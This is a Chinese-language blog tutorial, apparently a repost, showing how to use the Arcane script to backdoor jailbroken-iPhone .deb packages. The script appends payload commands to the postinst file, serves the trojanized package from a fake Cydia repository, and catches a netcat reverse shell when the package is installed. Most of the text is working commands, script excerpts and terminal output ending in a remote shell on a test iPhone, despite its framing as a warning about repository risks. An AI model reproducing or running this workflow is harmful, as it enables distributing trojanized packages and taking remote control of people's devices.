如何使用Arcane将有效载荷嵌入iPhone程序包

  • A+
所属分类:移动安全

0x00:前言

    人们普遍误以为iPhone 比Android 不受网络攻击和"更安全 "的影响.而且当iPhone确实遭到黑客入侵时,几乎不可能说出它发生了.

    iOS中的漏洞很常见,Apple尝试通过其发布的每个安全更新来解决这些漏洞.首先,请考虑去年公开的所有CVE.据我们所知,苹果在2020年迄今已发布了180多个补丁,而且可能还有更多未报告的补丁.


0x01如何入侵iPhone?

    过去十年中发布的越狱使用了广泛的iOS漏洞.政府机构每天使用未公开的漏洞来破坏iPhone的安全.像Zerodium这样的漏洞利用收购平台为私人iOS漏洞披露提供了高达200万美元的资金.

    话虽如此,本文将不会演示用于访问任何人的iPhone的便捷魔术按钮.它将使读者了解远程访问iPhone的可能性以及为什么使用越狱存储库很危险.


0x02不要错过:如何开始破解macOS计算机

步骤1:越狱iPhone

    要遵循本指南,需要使用越狱的iOS设备.我正在针对具有iOS 13.4.1的iPhone 7 Plus和具有iOS 13.5的iPhone 7测试这种攻击.使用unc0ver方法使iOS设备越狱.您也可以尝试其他越狱方法,例如Checkra1n.

更多信息:如何使用Unc0ver或Chimera越狱iOS 12至iOS 13.5

步骤2:克隆神秘的存储库

    Arcane是一个简单的自动化脚本,旨在对iOS程序包进行后门操作,并创建必要的资源来托管Cydia存储库.我为这篇文章创建了Arcane,以使该过程快速且可供初学者使用.克隆存储库之前,请确保已安装必需的依赖项并保持最新状态.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3
[sudo] password for kali:Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)Reading package lists... DoneReading package lists... DoneBuilding dependency treeReading state information... Donecoreutils is already the newest version (8.30-3+b1).dpkg is already the newest version (1.19.7kali1).python3 is already the newest version (3.8.2-3).python3 set to manually installed.The following additional packages will be installed:   git-man (1:2.27.0-1)   libbz2-1.0 (1.0.8-3)Suggested packages:   bzip2-doc (1.0.8-3)   git-daemon-run (1:2.27.0-1)   | git-daemon-sysvinit (1:2.27.0-1)   git-doc (1:2.27.0-1)   git-el (1:2.27.0-1)   git-email (1:2.27.0-1)   git-gui (1:2.27.0-1)   gitk (1:2.27.0-1)   gitweb (1:2.27.0-1)   git-cvs (1:2.27.0-1)   git-mediawiki (1:2.27.0-1)   git-svn (1:2.27.0-1)The following packages will be upgraded:   bzip2 (1.0.8-2 => 1.0.8-3)   git (1:2.26.2-1 => 1:2.27.0-1)   git-man (1:2.26.2-1 => 1:2.27.0-1)   libbz2-1.0 (1.0.8-2 => 1.0.8-3)   netcat-traditional (1.10-41.1+b1 => 1.10-45)5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.Need to get 8,643 kB of archives.After this operation, 2,424 kB of additional disk space will be used.Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]Fetched 8,643 kB in 2s (4,982 kB/s)apt-listchanges: Reading changelogs...(Reading database ... 287092 files and directories currently installed.)Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...Setting up libbz2-1.0:amd64 (1.0.8-3) ...(Reading database ... 287092 files and directories currently installed.)Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...Setting up netcat-traditional (1.10-45) ...Setting up bzip2 (1.0.8-3) ...Setting up git-man (1:2.27.0-1) ...Setting up git (1:2.27.0-1) ...Processing triggers for libc-bin (2.30-4) ...Processing triggers for man-db (2.9.1-1) ...Processing triggers for kali-menu (2020.2.2) ...

完成后,克隆Arcane存储库.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...remote: Enumerating objects: 16, done.remote: Counting objects: 100% (16/16), done.remote: Compressing objects: 100% (14/14), done.remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

递归(-R)修改所有权,以使文件无需root特权即可访问.

~$ sudo chown $USER:$USER -R /opt/arcane/

切换到新的/opt /arcane目录.

~$ cd /opt/arcane/

提升arcane.sh脚本的权限,以允许在Kali中执行.

~/opt/arcane$ sudo chmod +x arcane.sh

要查看可用选项,请使用--help参数执行Arcane .

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost <attacker ip> --lport <1337>

-i, --input iOS package to backdoor -f, --file file containing commands to exec (default: not required) -h, --lhost local ip address for nc listener -p, --lport local port for netcat listener (default: 1337) -c, --cydia generate resources for apt/cydia repository (default: disabled) -n, --netcat autostart netcat listener (default: disabled) -u, --udp enable udp (default: tcp) -x, --noart if you hate awesome ascii art (default: enabled) --help you're looking at it

步骤3:后门安装iOS程序包

Arcane存储库中包含一个“ samples /"目录,其中包含针对iOS体系结构编译的不同软件包.使用ls命令查看目录内容.

~/opt/arcane$ ls -la samples/

total 400drwxr-xr-x 2 root root 4096 Aug 4 11:32 .drwxr-xr-x 5 root root 4096 Aug 4 11:32 ..-rw-r--r-- 1 root root 100748 Aug 4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb-rw-r--r-- 1 root root 142520 Aug 4 11:32 network-cmds_543-1_iphoneos-arm.deb-rw-r--r-- 1 root root 76688 Aug 4 11:32 sed_4.5-1_iphoneos-arm.deb-rw-r--r-- 1 root root 60866 Aug 4 11:32 top_39-2_iphoneos-arm.deb-rw-r--r-- 1 root root 13810 Aug 4 11:32 whois_5.3.2-1_iphoneos-arm.deb

    从Bingner Cydia 官方仓库中提取的所有软件包都可在继续使用时使用.有关可用软件包的完整列表,请使用以下命令查看存储库内容.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages'| awk -v i='https://apt.bingner.com/' '/debs//{print i $2}'https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb...https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

    只要wget的您选择的软件包.本演练将使用在“ samples /"目录中找到的包.使用以下arcane命令对程序包进行后门操作.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat
░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝ ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░ ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░ ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗ ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝ v0.1 by @tokyoneon_


下面是每个参数的简要说明,您可以观看下面的GIF来查看正在使用的程序包.

--input:此参数定义所需程序包到后门的文件路径.--lhost:lhost(或localhost)定义为攻击者的IP地址,是必填参数.它告诉后门程序包Kali在网络上的位置.在这种情况下,我的Kali系统位于172.16.16.1.--lport:定义为20001的任意值,lport(或本地端口)告诉后门程序包Netcat侦听端口在哪里.--cydia:此参数指示Arcane生成必要的文件以托管Cydia存储库.--netcat:此参数告诉Arcane使用给定的协议和端口自动启动Netcat侦听器.

完成后,由于Netcat侦听器正在等待入站连接,因此无法使用Arcane终端.

如何使用Arcane将有效载荷嵌入iPhone程序包

步骤4:托管存储库资源

在Kali中打开一个新终端,并查看/tmp /cydia目录的内容.注意后门程序包.

~$ ls -la /tmp/cydia/

-rw-r--r-- 1 root root 29 Jul 29 14:44 index.html-rw-r--r-- 1 root root 639 Jul 29 14:44 Packages-rw-r--r-- 1 root root 494 Jul 29 14:44 Packages.bz2-rw-r--r-- 1 root root 143 Jul 29 14:44 Release-rw-r--r-- 1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

转到目录并启动一个简单的python3服务器,以使文件可被同一网络上的其他设备(例如,iPhone)访问.

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

步骤5:将存储库添加到Cydia

    确保越狱的iOS设备和Kali系统位于同一Wi-Fi网络上.然后,打开Cydia应用程序并导航到“源"选项卡.选择右上角的“编辑"按钮,然后选择左上角的“添加"按钮.

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

    当提示您输入URL时,输入托管Python服务器的Kali系统的IP地址.确保删除URL 中的http S,因为Cydia会默认尝试添加它.选择“添加源"以将其添加为存储库.最后,选择“返回Cydia"以查找新添加的存储库.

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

步骤6:安装后门程序包

选择存储库以找到后门程序包.确保Arcane终端仍在Kali中监听,然后在Cydia中选择“安装"和“确认".Cydia将安装该软件包并执行嵌入式有效负载.

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

如何使用Arcane将有效载荷嵌入iPhone程序包

Arcane如何运作?

    在Arcane终端中,成功执行命令将生成“ arcane>" shell提示符.使用sw_vers和uname查看操作系统和内核版本.

[░] /usr/bin/nc -v -l -p 20001[░] starting netcat listener on port 20001 with tcplistening on [any] 20001 ...172.16.16.25: inverse host lookup failed: Unknown hostconnect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050
arcane> sw_versProductName:    iPhone OSProductVersion: 13.4.1BuildVersion:   17E262arcane> uname -aDarwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwinarcane>

在这一点上,可能会发生各种利用后的攻击,但让我们谈谈奥术到底做了什么.步骤3中显示的GIF中发生了一些事情.

在Kali中,解压缩刚刚安装在iOS设备上的whois软件包.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

使用树查看目录内容.注意包含“控件"和“ postinst"文件的“ DEBIAN"目录.这两个文件对于Cydia如何索引软件包以及在安装过程中如何执行命令都非常重要.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/├── DEBIAN│ ├── control│ └── postinst└── usr └── bin └── whois

"control "文件(也称为“ control data")包含安装软件包时软件包管理工具(如dpkg)使用的值.奥术将修改或创建一个现有的控制文件.

# The "control" file template. Most iOS packages will include a# control file. In the event one is not found, Arcane will use the# below template. The `$hacker` variable is used here to occupy# various arbitrary fields.# https://www.debian.org/doc/manuals/maint-guide/dreq.en.htmlcontrolTemp="Package: com.$hacker.backdoorName: $hacker backdoorVersion: 1337Section: appArchitecture: iphoneos-armDescription: A backdoored iOS packageAuthor: $hacker <https://$hacker.github.io/>Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.if [[ ! -f "$tmp/DEBIAN/control" ]]; then # If no control is detected, create it using the template. echo "$controlTemp" > "$tmp/DEBIAN/control"; status "created control file" "error with control template";else # If a control file exists, Arcane will simply rename the package # as it appears in the list of available Cydia applications. This # makes the package easier to location in Cydia. msg "detected control file" succ; sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control"; status "modified control file" "error with control";fi;

    在安装,升级或删除应用程序时,可以将脚本作为软件包的一部分提供.软件包维护程序脚本包括preinst,postinst,prerm和postrm文件.在安装过程中,Arcane利用“ postinst"文件执行命令.

# The "post-installation" file. This file is generally responsible# for executing commands on the OS after installing the required# files. It's utilized by developers to manage and maintain various# aspects of an installation. Arcane abuses this functionality by# appending malicious Bash commands to the bottom of the file.postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the# postinst file.function inject_backdoor (){ # If --file is used, `cat` the command(s) into the postinst file. if [[ "$infile" ]]; then cat "$infile" >> "$postinst"; embed="[$infile]"; else # If no --file, utilize the simple Bash payload, previously # defined. echo -e "$payload" >> "$postinst"; embed="generic shell command"; fi; status "embedded $embed into postinst" "error embedding backdoor"; chmod 0755 "$postinst"};

鼓励读者查看Arcane资料,以更好地理解下划线命令.


0x03:iOS开发后攻击

    苹果的iOS和macOS相似;两种操作系统都是FreeBSD的衍生产品,并且系统的设置方式存在重叠,例如launchctl,keychain和文件系统结构.

如何使用Arcane将有效载荷嵌入iPhone程序包


本文始发于微信公众号(洛米唯熊):如何使用Arcane将有效载荷嵌入iPhone程序包

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: